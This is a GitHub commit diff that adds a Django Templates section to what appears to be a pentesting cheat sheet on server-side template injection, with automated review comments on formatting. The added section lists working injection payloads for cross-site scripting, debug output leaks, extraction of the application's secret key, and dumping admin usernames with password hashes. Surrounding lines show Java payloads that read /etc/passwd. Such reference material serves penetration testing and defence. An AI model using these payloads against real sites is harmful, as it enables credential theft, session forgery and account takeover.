Add Django Templates SSTI

This commit is contained in:
Techbrunch 2022-08-30 13:50:03 +02:00 committed by GitHub
parent fbd7517e04
commit 871b3bcaf2


@ -33,6 +33,7 @@
- [Java - Basic injection](#java---basic-injection) - [Java - Basic injection](#java---basic-injection)
- [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables)
- [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd) - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
- [Django Template](#django-template)
- [Jinja2](#jinja2) - [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format) - [Jinja2 - Template format](#jinja2---template-format)
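Review bot: the new table-of-contents entry `- [Django Template](#django-template)` does not match the heading this commit adds, which is `## Django Templates`; GitHub slugs that heading as `#django-templates`, so the link will be dead. Change the entry to `- [Django Templates](#django-templates)` so the text and anchor agree with the heading (and with the plural used in the reference title added at the end of the file).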
@ -337,6 +338,58 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
--- ---
## Django Templates
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
### Django Templates for post-exploitation
```python
# Variables
{{ variable }}
{{ variable.attr }}
# Filters
{{ value|length }}
# Tags
{% csrf_token %}
```
### Cross-site scripting
```python
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
```
### Debug information leak
```python
{% debug %}
```
### Leaking apps Secret Key
```python
{{ messages.storages.0.signer.key }}
```
### Admin Site URL leak
```
{% include 'admin/base.html' %}
```
### Admin username and password hash leak
```
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}
```
## Jinja2 ## Jinja2
[Official website](https://jinja.palletsprojects.com/) [Official website](https://jinja.palletsprojects.com/)
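Review bot: the code fences in this hunk are tagged inconsistently: the blocks under "Django Templates for post-exploitation", "Cross-site scripting", "Debug information leak" and "Leaking apps Secret Key" are tagged `python` even though they contain Django template syntax rather than Python, while the "Admin Site URL leak" and "Admin username and password hash leak" blocks have no tag at all. Pick one tag for all six (an untagged fence or `html`, which is what the Jinja2 section below uses for template payloads) so the highlighting does not mislead readers. Two further points in the same hunk: the intro sentence "Django template language supports 2 rendering engines by default" is imprecise, since it is the Django framework that ships two template backends (`DjangoTemplates` and `Jinja2`), not the template language itself, and "Django Templates is much simpler engine" needs an article; suggested wording: "Django ships two template backends by default: Django Templates (DT) and Jinja2. DT is a much simpler engine: it does not allow calling methods with arguments on passed objects, so the impact of SSTI in DT is often less severe than in Jinja2." Also, the "Django Templates for post-exploitation" section only lists basic variable, filter and tag syntax, so a heading such as "Django Templates - Basic syntax" would describe it better; and the `{{ messages.storages.0.signer.key }}` payload is worth a one-line caveat that it only works when `messages` is in the template context (the `django.contrib.messages` context processor is enabled, with the default `FallbackStorage`, whose first storage is the signed `CookieStorage`).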
@ -893,3 +946,4 @@ $str.valueOf($chr.toChars($out.read()))
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) * [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)